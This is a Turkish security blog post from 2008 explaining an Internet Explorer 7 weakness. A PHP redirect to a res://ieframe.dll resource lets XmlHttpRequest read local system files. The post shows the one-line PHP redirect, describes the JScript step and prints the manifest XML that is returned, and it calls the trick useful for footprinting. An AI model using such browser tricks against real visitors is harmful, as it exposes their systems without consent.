IE 7 Header Forwards

<< T-SQL Dersleri 2 | Güvenli Bankacılık İşlemleri >>

IE 7 Header Forwards

10 Nis 2008 Author: Admin In: Güncel, Güvenlik

Internet Explorer 7 de bir çok phishing ve benzeri saldırılara karşı filtreler geliştirilmişti.Genel olarak bakıldığında az ve orta düzey bilgiye sahip kullanıcıların ihtiyaçlarını karşılar nitelikte olan gelişmelerdi.Ancak son günler IE 8 beta sürümleri yayınlanmasının altında IE 7 ile birlikte gelen güvenlik zaafiyetlerinin patchlenmiş olması geliyor.IE 7 barındırdığı güvenlik zaafiyetlerinden biri header forwards (başlık yönlendirme)olarak adlandıracağımız resource schemelerinin sömürülerek XmlHttpRequest vasıtasıyla istediğimiz verileri elde etme imkanı buluyoruz.PHP ve JavaScript ile hazırlayacağımız örnek uygulamamız ile IE 7 için ieframe.dll dosyasından yararlanıp sistem özellikleri hakkındaki bilgileri bize yansıtıyor.

Örnek PHP kodumuz:

<?php
header("location: res://ieframe.dll/24/123");
?>

Örnek Jscript kodumuz:

Bir XML nesnesi oluşturup the_header_file.php içindeki yönlendirme işleminden alınan değerleri oluşturduğumuz XML dosyasına aktarıp sonucu bize gösteriyor.

XML talep işlemini gerçekleştirerek bize aşağıdaki sonucu getiriyor.

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>



<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">

<assemblyIdentity name="Microsoft.Windows.InetCore.ieframe"processorArchitecture="x86" version="5.1.0.0" type="win32" />

<description>Windows IE</description>

<dependency>

<dependentAssembly>

<assemblyIdentity type="win32"name="Microsoft.Windows.Common-Controls"version="6.0.0.0" processorArchitecture=""

publicKeyToken="6595b64144ccf1df" language="" />

</dependentAssembly>

</dependency>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">

<security>

<requestedPrivileges>

<requestedExecutionLevel level="asInvoker" uiAccess="false" />

</requestedPrivileges>

</security>

</trustInfo>

<asmv3:application>

<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">

<dpiAware>true</dpiAware>

</asmv3:windowsSettings>

</asmv3:application>

</assembly>

IE 7 'deki bu güvenlik vasıtasıyla sistem üzerindeki farklı noktalar ile temas kurulabilir.Footprinting gibi işlemlerde temel tespit ögesi olarak kullanılabilir.

0 Yorumlar

İlişkili yazılar

IE7 Remote File Read Access IE 7′de tespit edilen güvenlik açığına göre sistemde kayıtlı olan dosyalar...PostViewer Flash Gallery Flash galerileri tasarımlarımızda kullanıcılar tarafından ilgi duyulan noktalarda sıkça kul...IE 8 XSS Filter Yazılımcıların son yıllardaki belalarından biride XSS (cross site scripting) saldırıları oluyor. ...

Yorum ekle

İsim*
E-mail* (Gravatar simgesini gösterecek)
Web sitesi
Ülke Country flag

b i u quote

Yorum
Canlı önizleme

Yeni yorum eklendiğinde beni haberdar et

yorumları içer

Yazılar (RSS)

Blog'dan

Biraz yazılım,biraz güvenlik,biraz da hayattan karalamalar ...

İletişim: ok@olcaykuk.com

Son yorumlar
Son yazılar

Repeater ve DataList ile Pratik Sayfalama İşlemi (2)
Admin yazdı: CollectionPager dosyasını tekrar import etmeyi den… [Fazlası]
Repeater ve DataList ile Pratik Sayfalama İşlemi (2)
cem yazdı: Merabalar, Ben repeatere sayfalama eklemek istiyor… [Fazlası]
Özgünlüğün Yok Oluşu (7)
UĞUR yazdı: Yazıyı baştan sona keyifle okudum. İnternette … [Fazlası]
Zengin Eden En İlginç Fikirler (2)
busra yazdı: Bilgilendirme İçin Teşekkürler [Fazlası]
SAP ve ERP Seminerleri (1)
mirc indir yazdı: paylaşım için tşk [Fazlası]
IP Gizleme Teknikleri (9)
mirc indir yazdı: peki bunları yaptıktan sonra bir yasal sorumluluğu… [Fazlası]
Jquery ile Page Peel Uygulaması (1)
mirc indir yazdı: bilgiler için teşekkürler. [Fazlası]
Sahte Kahramanlar (7)
Emrah Tunç yazdı: Güzel bi yazı olmuş ellerine sağlık; bende… [Fazlası]
IP Gizleme Teknikleri (9)
songul yazdı: merhaba arkadaşlar ben tor kurdum yanlız mozillada… [Fazlası]
Web Uygulamaları 2008 İstatistikleri (1)
Ömer Faruk ZORLU yazdı: Bu tür sıkıntıları çözmek adına t&#… [Fazlası]

KÖŞE YAZISI

"Asl Pls" ve Bugün